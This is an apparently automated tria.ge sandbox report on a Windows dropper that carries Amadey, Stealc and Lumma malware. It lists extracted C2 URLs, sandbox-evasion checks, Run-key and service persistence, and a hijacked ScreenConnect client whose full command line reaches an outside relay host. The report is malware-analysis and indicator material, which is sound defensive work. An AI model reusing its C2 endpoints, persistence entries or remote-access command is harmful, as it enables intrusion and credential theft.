Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06/11/2024, 22:25
Static task
static1
General
-
Target
d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe
-
Size
6.0MB
-
MD5
d7a40118e6d4686b4a11f4ac49ccaf1d
-
SHA1
d80be69c93759cfd2bb9dec276979e196202aab1
-
SHA256
d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c
-
SHA512
a1126fe60f9891131ac9de04f3b1512e7da0197c168c9d1d3d4632ad52eaf002467220bd5b423d3a21212b558daa444cc4cb40a806cf3f06bf0a7b1b6a5137a3
-
SSDEEP
98304:7Gb+KW8pO2DH2OP/yErov5MtEkVxXaFwpyAnSWxuv38/oPOYPnAAya0wjSQ/gaY6:7hKW8pRNyUov5Mt9xKFwpBfwrG4z
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
tale
http://185.215.113.206
-
url_path
/6c4adf523b719729.php
Extracted
lumma
https://founpiuer.store/api
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3s79Z.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 155aa5ef5f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1efbfbe0a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1K20A9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2z8437.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (d24c72d59e97003e)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (d24c72d59e97003e)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=instance-jo8t3z-relay.screenconnect.com&p=443&s=a79bfa06-e94f-44e4-9b80-51e71f3cd8f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBlgoG8SEwJuyUMAVbS1u9ET8b79k7P%2f7J4ow1fhC2ZualDFO3ArdOiWpDAdhopcBg1REuXbjohRxTcgfk%2fkWJ0WT0qz5dal4OA949TlU4xXVZgsV0RQ27tunoj2Q3J7A0ZtL3jq76NFZjZmVG7GZ8TBeTo5Y06XH33FmoVf9VwzHvTmfCw68ESdxodX61R68SwDT%2feGQQsd4M4MsJXToPLVYZqtW1TRq5D4ltSurcvRmEJarN0C6Zv%2fcAzkHuYmbZkQ9ewAJ6tbcDfe8cR98K4%2f5CyE7xxC2Ljkso4d5K3C2QDFOLofUwV0kLgDGg60cdSrGBhJhxOkipcAOnC%2fXDH&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAr3enNPAhkUuG52MNvdQztwAAAAACAAAAAAAQZgAAAAEAACAAAADf4PYnAGAvxFuJy3KlRour1j702GlM4qES4fV%2bZ9igRgAAAAAOgAAAAAIAACAAAAA7yTIcp6XdEtDObdGkF64R2QdTKbluumlDoWkxECRYdaAEAAAYPeKzr4F%2b9Bh0%2bbvKO5GBarSOt1RrfT4CEoYM3iWHzQc%2ftW%2b3d46NDHgW2qti3aDKws4Ky%2fP%2bnyxnfAqJTzgCvO%2b5RVBAhs1C%2bRtA2Zwz2DEk7t64y7AUuHio%2be6DJcKzNk9B81%2bkdihB3%2fbwJnpA1HVmryAh0jmC964LRIdfMwBqxTxrh1hPml4INEjiCZSpgIrOXeIl%2fjepJk1R8m3SxviZmjMDX3hguUs6XviSCz1pYu8Twxqq3Nrj0yW7jJSLxfDQNYN9TsDX2Pnj7t9XSM1qNvCDqaZb0vcEoUGYBXw0a6iRipomW%2fd3rz0gbCTwByYKlUHbZv4n7BfEKfzKqUS%2fChMnXlwULyU%2fq%2ffLde0ML%2fgvAciEvUf9OJss7YhwsVvSbobzmQZifDrDxDf0L%2bm91wEMDqf7GL6PFS4mi6OWpe8VntnIi25AsBJUprJPOvZRtYW%2fbYNAJFlGMmxuNO9RaVj1Nrp8PF2rnrwHAQEzOHPrWvusNTdETqjygWFHZRT3%2blhF5m0Ou1Sm9zgcQ78bSTKGHoNG0Hm2qwpNwT8D40u4aqzHYUfPrCvdITIhC9Zj84fyZozwk6QUqFd7CCwxlJbNN6LEbZzKKKcsENvbSZ5Elcrp3majNxzK8nYju19tDbCIZ7j8a%2fFop46GvRfhxWsQUfUO46wM7LkIZoC0hTNXG%2fuf2GXcTWQUVGJz0P9Dy9x9cu5DXhj%2fnD09ExotO9QozaNqzIllCv1PDWlXLma7U7KyJWu%2f47xTXGfwFDERRRxU0mpFK6BPB84YZZeeQsUB267SbrCUSq2foqT0wJOGKEL4WWWgNUOmM67DV4rBXORT%2bakoWGLF27BptYJHRYCt7prO36%2fVC%2bn630PULNBC3PmoQ0tBc3lgTMql65uYr%2bnJW1QHnI2ZkPebVL15VHXq4eGbqZOqQaeCrf7t1UpJdMDaOrJwmH0rdUNjOaYrCfPU8v0bzObY6uyksmVMH7w555osQSAH%2bgZ0MVArOQYoT%2fE%2bKaVNG2mjJS%2f%2f41B8YI%2fZxCynkHVfqtpQS8VYAf0ka4EuYVTA5nKHWL%2f3ZL6aQ3F6oYBYBdv8uMQ2mTj7p5QD9k08P5tYbYa2zndEpd6sUYP5HWCz6VdI7XKTUoshpiaZLG8rJEJotGBhTuuQMXbQK2N3mmRc6SDXP7D2c2M7KwJVX2IJIQbbGuZdPu8SgGj1gnyyW9bOl9KZ784o4UK0Mvl1jbwrD0aALJ88SotECO15Spn24ORN4KQ7LFFesdHzwIfWv6AaKuvAtb5q%2fuDjgDoDtbWl46n8vqBBHWOGU%2fynQIyZfJKwGNpVb4As91uDC3Ts9Wkls6jh8y0YGA8%2b%2fCSp8HKB%2f5s1P55%2blyFYWi6k%2bUtjCA8zQj7XxfTpGLpK08WEWa7lq9KYGkGxIrNW7OFdvxgscjZ75FTeoPbo6UiOqMq42oGLBkaFZuvXGIJJwvx9%2bHvhbzEX4R9ONrdufYGPCXickVIZE%2fgrpq4Hd4BdW9RNcoFdbe2JY3UqA6GjYRnSDs9SEEmX9RrejPZDgqskLfRSxhHamcAUJd0yaaKCuG84fKpaKkAAAACqaCrlhWaAL7LWJvKp1pf3esELzt%2bfFhpLvr9dbYuugF4R7f1LuK0U634UPL%2bbdGs6RPwegaCq1CXhuTMFbLlD&c=zhark&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1efbfbe0a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1K20A9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2z8437.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1K20A9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2z8437.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3s79Z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1efbfbe0a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3s79Z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 155aa5ef5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 155aa5ef5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 1K20A9.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation zhark.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 15 IoCs
pid Process 1364 k3a89.exe 3512 l3v78.exe 4180 1K20A9.exe 2616 skotes.exe 2228 2z8437.exe 1280 3s79Z.exe 5000 4T753l.exe 1916 zhark.exe 6068 155aa5ef5f.exe 6652 1efbfbe0a1.exe 552 ScreenConnect.ClientService.exe 5624 ScreenConnect.WindowsClient.exe 6168 ScreenConnect.WindowsClient.exe 2708 skotes.exe 6528 skotes.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 3s79Z.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 155aa5ef5f.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 1efbfbe0a1.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 1K20A9.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 2z8437.exe -
Loads dropped DLL 22 IoCs
pid Process 4592 MsiExec.exe 7152 rundll32.exe 7152 rundll32.exe 7152 rundll32.exe 7152 rundll32.exe 7152 rundll32.exe 7152 rundll32.exe 7152 rundll32.exe 7152 rundll32.exe 7152 rundll32.exe 1664 MsiExec.exe 5232 MsiExec.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe 552 ScreenConnect.ClientService.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" l3v78.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\155aa5ef5f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004459001\\155aa5ef5f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1efbfbe0a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004460001\\1efbfbe0a1.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" k3a89.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023cb6-47.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800640032003400630037003200640035003900650039003700300030003300650029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d24c72d59e97003e)\zdfh0fmh.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d24c72d59e97003e)\zdfh0fmh.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4180 1K20A9.exe 2616 skotes.exe 2228 2z8437.exe 1280 3s79Z.exe 6068 155aa5ef5f.exe 6652 1efbfbe0a1.exe 2708 skotes.exe 6528 skotes.exe -
Drops file in Program Files directory 17 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\Client.de-DE.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.Client.dll msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI6C72.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6C42.tmp msiexec.exe File created C:\Windows\Installer\e586b67.msi msiexec.exe File opened for modification C:\Windows\Installer\e586b67.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{94403E12-55EA-5A97-96D0-E794DB360E09} msiexec.exe File created C:\Windows\Installer\wix{94403E12-55EA-5A97-96D0-E794DB360E09}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\e586b69.msi msiexec.exe File created C:\Windows\Installer\{94403E12-55EA-5A97-96D0-E794DB360E09}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\skotes.job 1K20A9.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\{94403E12-55EA-5A97-96D0-E794DB360E09}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\MSI6D5D.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3000 2228 WerFault.exe 92 824 2228 WerFault.exe 92 6516 6068 WerFault.exe 140 -
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language l3v78.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zhark.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1K20A9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 155aa5ef5f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3s79Z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4T753l.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k3a89.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2z8437.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1efbfbe0a1.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f59c2d6185d8bf0c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f59c2d610000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f59c2d61000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df59c2d61000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f59c2d6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 4536 taskkill.exe 4856 taskkill.exe 776 taskkill.exe 4068 taskkill.exe 1476 taskkill.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe -
Modifies registry class 38 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-d24c72d59e97003e\shell\open msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\21E30449AE5579A5690D7E49BD63E090 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\ProductIcon = "C:\\Windows\\Installer\\{94403E12-55EA-5A97-96D0-E794DB360E09}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\21E30449AE5579A5690D7E49BD63E090\AuthorizedLUAApp = "0" msiexec.exe Key created 